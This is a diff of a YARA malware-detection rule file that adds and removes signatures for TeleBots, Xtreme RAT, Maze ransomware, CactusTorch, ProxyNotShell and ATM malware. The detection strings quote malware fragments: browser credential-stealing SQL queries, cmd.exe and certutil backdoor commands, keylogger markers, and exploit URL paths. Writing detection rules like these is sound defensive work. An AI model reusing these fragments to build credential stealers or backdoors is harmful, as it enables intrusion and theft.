+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ( $s* ) and 1 of ( $x* ) and 3 of ( $y* ) ) )
 }
-rule SIGNATURE_BASE_SUSP_Deviceguard_WDS_Evasion : FILE
+rule SIGNATURE_BASE_APT_MAL_Wildneutron_Javacpl : FILE
 {
 	meta:
-		description = "Detects WDS file used to circumvent Device Guard"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "469b60d4-43d3-5a85-aa51-e453d8c858c0"
-		date = "2015-01-01"
+		id = "de82827e-61d4-559e-886a-78d5293ab141"
+		date = "2015-07-10"
 		modified = "2023-01-06"
-		reference = "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_deviceguard_evasion.yar#L2-L17"
+		old_rule_name = "WildNeutron_javacpl"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L272-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4be9d7c34f7bafeb53db4fc1262a3692493b2253b0de7dc97480b01b62a9f12c"
-		score = 70
+		logic_hash = "c9cb6ab956d29df9f59520262ab308a0256747cc3c898979347304950e093098"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
+		hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
+		hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
 
 	strings:
-		$s1 = "r @$ip=@$t0" ascii
-		$s2 = ";eb @$t0+" ascii
-		$s3 = ".foreach /pS" ascii
+		$s1 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
+		$s2 = "cmdcmdline" wide fullword
+		$s3 = "\"%s\" /K %s" wide fullword
+		$s4 = "Process is not running any more" wide fullword
+		$s5 = "dpnxfsatz" wide fullword
+		$op1 = { ff d6 50 ff 15 ?? ?? 43 00 8b f8 85 ff 74 34 83 64 24 0c 00 e8 ?? ?? 02 00 }
+		$op2 = { b8 02 00 00 00 01 45 80 01 45 88 6a 00 47 52 89 7d 8c 03 d8 }
+		$op3 = { 8b c7 f7 f6 46 89 b5 c8 fd ff ff 0f b7 c0 8b c8 0f af ce 3b cf }
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Ce_Enfal_Cmstar_Debug_Msg : FILE
+rule SIGNATURE_BASE_Crime_Win32_Ransom_Maze_Dll_1 : FILE
 {
 	meta:
-		description = "Detects the static debug strings within CMSTAR"
-		author = "rfalcone"
-		id = "2c483f20-4fa8-5246-9dcb-8868db64b6e3"
-		date = "2015-05-10"
+		description = "Detects Maze ransomware payload dll unpacked"
+		author = "@VK_Intel"
+		id = "873aea2b-2dd4-5682-b979-35e73fbc189f"
+		date = "2020-04-18"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/JucrP9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cmstar.yar#L2-L20"
+		reference = "https://twitter.com/VK_Intel/status/1251388507219726338"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_maze_ransomware.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9b9cc7e2a2481b0472721e6b87f1eba4faf2d419d1e2c115a91ab7e7e6fc7f7c"
-		logic_hash = "31251b7ce33eb561aeb7405514df83dc1e00fdf184e3deeaa48505407d9567a0"
+		logic_hash = "5b76636c05141687fa5cc507ac67d6a5d1f6c89166fd302e94fe61b412451159"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		tlp = "white"
 
 	strings:
-		$d1 = "EEE\x0d\x0a" fullword
-		$d2 = "TKE\x0d\x0a" fullword
-		$d3 = "VPE\x0d\x0a" fullword
-		$d4 = "VPS\x0d\x0a" fullword
-		$d5 = "WFSE\x0d\x0a" fullword
-		$d6 = "WFSS\x0d\x0a" fullword
-		$d7 = "CM**\x0d\x0a" fullword
+		$str1 = "Maze Ransomware" wide
+		$str2 = "--logging" wide
+		$str3 = "DECRYPT-FILES.txt" wide
+		$tick_server_call = { ff ?? ?? 8b ?? ?? ?? ?? ?? ff d6 8b ?? 89 f9 50 ff ?? ?? ff d6 8d ?? ?? ?? 89 ?? ?? ?? 56 e8 ?? ?? ?? ?? 83 c4 04 b9 67 66 66 66 89 c5 f7 e9 89 d0 d1 fa c1 e8 1f 01 c2 8d ?? ?? 29 c5 56 e8 ?? ?? ?? ?? 83 c4 04 b9 56 55 55 55 89 c6 f7 e9 89 f9 89 d0 c1 e8 1f 01 d0 8d ?? ?? 29 c6 8b ?? 55 56 ff ?? ?? 85 c0 0f ?? ?? ?? ?? ?? 89 ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 c5 50 ff d3 89 c6 ff ?? ?? ?? ff d3 8b ?? ?? ?? 01 f0 3d ff 03 00 00 0f ?? ?? ?? ?? ?? 55 ff ?? ?? ?? 68 a2 95 c3 00 53 ff ?? ?? ?? ?? ?? 83 c4 10 c6 ?? ?? ?? c6 ?? ?? ?? ?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $d* )
+		( uint16( 0 ) == 0x5a4d and 3 of them ) or all of them
 }
-rule SIGNATURE_BASE_SVG_Loadurl : FILE
+
+rule SIGNATURE_BASE_BKDR_Snarasite_Oct17 : FILE
 {
 	meta:
-		description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3d4c95f-ef8b-52ff-9cf9-d66d9b99a490"
-		date = "2015-05-24"
+		id = "3a5d156a-529b-52ae-9b6a-d454895eb1fb"
+		date = "2017-10-07"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/psjCCc"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cryptowall_svg.yar#L2-L21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_snarasite.yar#L3-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d9e40694e2d0099495289a2074e266bace9b0d9d776391020a1527eaabd2a395"
-		score = 50
+		logic_hash = "79f49bce6de996d20b64476feb73987fdcd7555963ea1a596648d8702fbd2898"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac8ef9df208f624be9c7e7804de55318"
-		hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
-		hash3 = "7e2be5cc785ef7711282cea8980b9fee"
-		hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
-
-	strings:
-		$s1 = "</svg>" nocase
-		$s2 = "<script>" nocase
-		$s3 = "location.href='http" nocase
+		hash1 = "36ba92cba23971ca9d16a0b4f45c853fd5b3108076464d5f2027b0f56054fd62"
 
 	condition:
-		all of ( $s* ) and filesize < 600
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "322bef04e1e1ac48875036e38fb5c23c" or pe.imphash ( ) == "15088754757513c92fa36ba5590e907b" )
 }
-rule SIGNATURE_BASE_Telebots_Intercepterng : FILE
+
+rule SIGNATURE_BASE_Xtreme_Sep17_1 : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - IntercepterNG"
+		description = "Detects XTREME sample analyzed in September 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4d48eb6-8235-534d-a32f-7f2711b96e9d"
-		date = "2016-12-14"
+		id = "7517e237-9cad-5619-9028-4c7ab5463040"
+		date = "2017-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L10-L30"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L14-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbf0d44d871ec471e891fb909612f58263ec0b0c702f87875f6e027362409318"
+		logic_hash = "fa78b43f729032291c27f67dc53bd39a85c9a50323c7adf909ca2a8c5acdd861"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5f9fef7974d37922ac91365588fbe7b544e13abbbde7c262fe30bade7026e118"
+		hash1 = "93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6"
 
 	strings:
-		$s1 = "Usage: %s iface_num\\dump [mode] [w] [-gw] [-t1 ip]" fullword ascii
-		$s2 = "Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X]" fullword ascii
-		$s3 = "3: passwords + files, no arp poison" fullword ascii
-		$s4 = "IRC Joining Keyed Channel intercepted" fullword ascii
-		$s5 = "-tX - set target ip" fullword ascii
-		$s6 = "w - save session to .pcap dump" fullword ascii
-		$s7 = "example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5" fullword ascii
-		$s8 = "ORACLE8 DES Authorization intercepted" fullword ascii
+		$x1 = "ServerKeyloggerU" fullword ascii
+		$x2 = "TServerKeylogger" fullword ascii
+		$x3 = "XtremeKeylogger" fullword wide
+		$x4 = "XTREMEBINDER" fullword wide
+		$s1 = "shellexecute=" fullword wide
+		$s2 = "[Execute]" fullword wide
+		$s3 = ";open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "735af2a144f62c50ba8e89c1c59764eb" or ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_Telebots_Killdisk_1 : FILE
+rule SIGNATURE_BASE_Xtreme_Sep17_2 : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - KillDisk"
+		description = "Detects XTREME sample analyzed in September 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "111fc6bc-b790-51b9-81b7-a4716bb0aee9"
-		date = "2016-12-14"
+		id = "b4878e80-54dc-5a16-9129-ddf2b1a5d287"
+		date = "2017-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L32-L51"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L39-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e70d324c408bae1bb42b16f19cd0e6b87e8228c7480d571fef5266eee5695fd2"
+		logic_hash = "cb86167e0267d52b1b7503abd8f5b988296e3cde12453ace529c4e043d2ca69e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8246f709efa922a485e1ca32d8b0d10dc752618e8b3fce4d3dd58d10e4a6a16d"
+		hash1 = "f8413827c52a5b073bdff657d6a277fdbfda29d909b4247982f6973424fa2dcc"
 
 	strings:
-		$s1 = "Plug-And-Play Support Service" fullword wide
-		$s2 = " /c \"echo Y|" fullword wide
-		$s3 = "-set=06.12.2016#09:30 -est=1410" fullword ascii
-		$s4 = "%d.%d.%d#%d:%d" fullword ascii
-		$s5 = " /T /C /G " fullword wide
-		$s6 = "[-] > %ls" fullword wide
-		$s7 = "[+] > %ls" fullword wide
+		$s1 = "Spy24.exe" fullword wide
+		$s2 = "Remote Service Application" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them ) or ( 6 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them )
 }
-rule SIGNATURE_BASE_Telebots_Killdisk_2 : FILE
+rule SIGNATURE_BASE_Xtreme_Sep17_3 : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - KillDisk"
+		description = "Detects XTREME sample analyzed in September 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7797187f-c94b-5323-ae43-2dc001f0b481"
-		date = "2016-12-14"
+		id = "160673ea-b263-520a-a1c1-da0f3e920f12"
+		date = "2017-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L53-L68"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L55-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4ae09a226c4eecae18e685423ef30b3776be518609f89a078c647fe8ee00f19"
+		logic_hash = "c110863028ab1f557270e52de608179ce582a47e0a20994f83d385ed285bda9a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "26173c9ec8fd1c4f9f18f89683b23267f6f9d116196ed15655e9cb453af2890e"
+		hash1 = "f540a4cac716438da0c1c7b31661abf35136ea69b963e8f16846b96f8fd63dde"
 
 	strings:
-		$s1 = "Plug-And-Play Support Service" fullword wide
-		$s2 = " /c \"echo Y|" fullword wide
-		$s3 = "%d.%d.%d#%d:%d" fullword ascii
+		$s2 = "Keylogg" fullword ascii
+		$s4 = "XTREME" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_Telebots_Credraptor_Password_Stealer : FILE
+
+rule SIGNATURE_BASE_Xtreme_RAT_Gen_Imp : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - CredRaptor Password Stealer"
+		description = "Detects XTREME sample analyzed in September 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f594a946-13b4-5179-9029-a0730634d55f"
-		date = "2016-12-14"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L70-L88"
+		id = "10b23099-2a87-5918-927b-f20bcba1cd70"
+		date = "2017-09-27"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L71-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed884cb7643a61109f87e2887bed7ddb838c73bce28812b76c35bb807629e116"
+		logic_hash = "9cfd6473e7f8d1f899fe2cdbb49a4086ea7ac6151602d0964ed28b16d2d0188d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "50b990f6555055a265fde98324759dbc74619d6a7c49b9fd786775299bf77d26"
-
-	strings:
-		$s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii
-		$s2 = "SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins" fullword ascii
-		$s3 = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS" fullword ascii
-		$s4 = ".\\PAI\\IEforXPpasswords.txt" ascii
-		$s5 = "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$s6 = "Opera old version credentials" fullword wide
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b5082bcc8487bb65c38e34c192c2a891e7bb86ba97281352b0837debee6f1cf"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "d0bdf112886f3d846cc7780967d8efb9" or pe.imphash ( ) == "cc6f630f214cf890e63e899d8ebabba6" or pe.imphash ( ) == "e0f7991d50ceee521d7190effa3c494e" )
 }
-rule SIGNATURE_BASE_Telebots_VBS_Backdoor_1 : FILE
+rule SIGNATURE_BASE_ATM_Malware_Loup_1 : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - VBS Backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2b711f66-8ec5-5b9a-a762-7e6668c821c9"
-		date = "2016-12-14"
+		description = "Detects ATM Malware Loup"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "2215a93f-d854-5f9b-b5cd-53962c45db08"
+		date = "2020-08-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L90-L106"
+		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_loup.yar#L3-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4ff4963058674cf71c123af74c0947da2edf3b5e2622261d14200f406dbe2992"
+		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+		logic_hash = "5068c3f27cf821f512fb9a473d2bd45066d550f30fbc26f0cbebbe103e6f4ccb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb31a918ccc1643d069cf08b7958e2760e8551ba3b88ea9e5d496e07437273b2"
 
 	strings:
-		$s1 = "cmd = \"cmd.exe /c \" + arg + \" >\" + outfile +\" 2>&1\"" fullword ascii
-		$s2 = "GetTemp = \"c:\\WINDOWS\\addins\"" fullword ascii
-		$s3 = "elseif (arg0 = \"-dump\") Then" fullword ascii
-		$s4 = "decode = \"certutil -decode \" + source + \" \" + dest  " fullword ascii
+		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii
+		$String2 = "CurrencyDispenser1" ascii
+		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
 
 	condition:
-		( uint16( 0 ) == 0x6553 and filesize < 8KB and 1 of them ) or ( all of them )
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
 }
-rule SIGNATURE_BASE_Telebots_VBS_Backdoor_2 : FILE
+rule SIGNATURE_BASE_SUSP_Vulndriver_HP_Hardware_Diagnostics_Etdsupp_May23 : FILE
 {
 	meta:
-		description = "Detects TeleBots malware - VBS Backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "151849af-f1d0-529c-94f2-287312f6515e"
-		date = "2016-12-14"
+		description = "Detects vulnerable versions of the HP Hardware Diagnostics driver (etdsupp.sys) based on PE metadata info"
+		author = "X__Junior (Nextron Systems)"
+		id = "8f838e4f-3e3e-5131-9d67-e49f6848bb37"
+		date = "2023-05-12"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L108-L123"
+		reference = "https://github.com/alfarom256/HPHardwareDiagnostics-PoC/tree/main/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_vulndriver_hp_hardware_diagnostics_etdsupp_may23.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "299a2ca6eacc29b4a7697a8502a56cffda4f6bc6b3354d3cc133712c1755c476"
-		score = 75
+		hash = "f744abb99c97d98e4cd08072a897107829d6d8481aee96c22443f626d00f4145"
+		logic_hash = "bb50f591e49b1b0b08ccbe4ca5cb3685d8f358e51e6d6f77677bc05701f6b301"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b2a5922b58c8060844b43e14dfa5b0c8b119f281f54a46f0f1c34accde71ddb"
 
 	strings:
-		$s1 = "cmd = \"cmd.exe /c \" + arg + \" \" + arg2" fullword ascii
-		$s2 = "Dim WMI:  Set WMI = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")" fullword ascii
-		$s3 = "cmd = \"certutil -encode -f \" + source + \" \" + dest" fullword ascii
+		$s1 = {4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 65 00 74 00 64 00 73 00 75 00 70 00 70 00 2e 00 73 00 79 00 73 00}
+		$s2 = "etdsupp.pdb"
+		$s3 = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}([\x00-\xff]{2}[\x00-\x11]\x00[\x00-\xff]{4}|\x00\x00\x12\x00\x00\x00\x00\x00)/
 
 	condition:
-		( uint16( 0 ) == 0x6944 and filesize < 30KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and int16 ( uint32( 0x3C ) + 0x5c ) == 0x0001 and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Telebots_Win64_Spy_Keylogger_G : FILE
+rule SIGNATURE_BASE_LOG_Proxynotshell_POC_CVE_2022_41040_Nov22 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects TeleBots malware - Win64 Spy KeyLogger G"
+		description = "Detects logs generated after a successful exploitation using the PoC code against CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) in Microsoft Exchange servers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd16a198-1b28-532b-a1ba-70680469ec51"
-		date = "2016-12-14"
+		id = "1e47d124-3103-5bf5-946f-b1bb69ff2c8e"
+		date = "2022-11-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4if3HG"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L125-L144"
+		reference = "https://github.com/testanull/ProxyNotShell-PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_proxynotshell_cve_2022_41040.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1b4db8f290bd4f943a90669afd5bff6b766d0723fb3ee9c69d7097e737beadc8"
-		score = 75
+		logic_hash = "7f91502fd9c59180970fc4253134582b44ba318db03ef4eb575257b2f3818d94"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e3f134ae88f05463c4707a80f956a689fba7066bb5357f6d45cba312ad0db68e"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii
-		$s2 = "Install hooks error!" fullword wide
-		$s4 = "%ls%d.~tmp" fullword wide
-		$s5 = "[*]Window PID > %d: " fullword wide
-		$s6 = "Install hooks ok!" fullword wide
-		$s7 = "[!]Clipboard paste" fullword wide
-		$s9 = "[*] IMAGE : %ls" fullword wide
+		$aa1 = " POST " ascii wide
+		$aa2 = " GET " ascii wide
+		$ab1 = " 200 " ascii wide
+		$s01 = "/autodiscover.json x=a" ascii wide
+		$s02 = "/autodiscover/admin@localhost/" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 3 of them )
+		1 of ( $aa* ) and $ab1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_MAL_Falsefont_Backdoor_Jan24 : FILE
+rule SIGNATURE_BASE_CACTUSTORCH : FILE
 {
 	meta:
-		description = "Detects FalseFont backdoor, related to Peach Sandstorm APT"
-		author = "X__Junior, Jonathan Peters"
-		id = "b6a3efff-2abf-5ac1-9a2b-c7b30b51f92c"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://twitter.com/MsftSecIntel/status/1737895710169628824"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_peach_sandstorm.yar#L1-L31"
+		description = "Detects CactusTorch Hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "75606b9e-97d5-5b8b-87f5-69b7e415b73c"
+		date = "2017-07-31"
+		modified = "2023-12-05"
+		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gen_cactustorch.yar#L11-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614"
-		logic_hash = "9a1b3779b63dd7fa8ddc84067dec09542518e9acebbf5d3b45cb75ec4add1158"
-		score = 80
+		logic_hash = "265287b27aa13840366dbb51ea58b2fdd10e0a57ff27d8deb52ff77dd71c26ad"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c"
+		hash2 = "0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea"
+		hash3 = "a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7"
 
 	strings:
-		$x1 = "Agent.Core.WPF.App" ascii
-		$x2 = "3EzuNZ0RN3h3oV7rzILktSHSaHk+5rtcWOr0mlA1CUA=" wide
-		$x3 = "viOIZ9cX59qDDjMHYsz1Yw==" wide
-		$sa1 = "StopSendScreen" wide
-		$sa2 = "Decryption failed :(" wide
-		$sb1 = "{0}     {1}     {2}     {3}" wide
-		$sb2 = "\\BraveSoftware\\Brave-Browser\\User Data\\" wide
-		$sb3 = "select * from logins" wide
-		$sb4 = "Loginvault.db" wide
-		$sb5 = "password_value" wide
+		$x1 = "$payload = shellcode(%options[\"listener\"], \"true\", \"x86\");" fullword ascii
+		$x2 = "Copy the base64 encoded payload into the code variable below." fullword ascii
+		$x3 = " CACTUSTORCH Payload" ascii
+		$x4 = "ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)" fullword ascii
+		$x5 = "' Author: Vincent Yiu (@vysecurity)" fullword ascii
+		$x6 = "Dim binary : binary = \"rundll32.exe\"" fullword ascii
+		$a1 = "code = code & \"" ascii
+		$a2 = "serialized_obj = serialized_obj & \"" ascii
+		$s1 = "binary = \"rundll32.exe\"" fullword ascii
+		$s2 = "EL.DataType = \"bin.hex\"" fullword ascii
+		$s3 = "Set stm = CreateObject(\"System.IO.MemoryStream\")" fullword ascii
+		$s4 = "var binary = \"rundll32.exe\";" fullword ascii
+		$s5 = "var serialized_obj = \"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or ( 1 of ( $sa* ) and 4 of ( $sb* ) ) )
+		( filesize < 800KB and ( 1 of ( $x* ) or ( 1 of ( $a* ) and 1 of ( $s* ) ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Groups_Cpassword : FILE
+rule SIGNATURE_BASE_Kraken_Bot_Sample : FILE
 {
 	meta:
-		description = "Groups XML contains cpassword value, which is decrypted password - key is in MSDN http://goo.gl/mHrC8P"
+		description = "Kraken Bot Sample - file inf.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37036df9-871f-5ecd-acac-6a064d298115"
-		date = "2015-09-08"
+		id = "508bb581-9dad-5201-af3d-7da17d905dc9"
+		date = "2015-05-07"
 		modified = "2023-12-05"
-		reference = "http://www.grouppolicy.biz/2013/11/why-passwords-in-group-policy-preference-are-very-bad/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gpp_cpassword.yar#L2-L20"
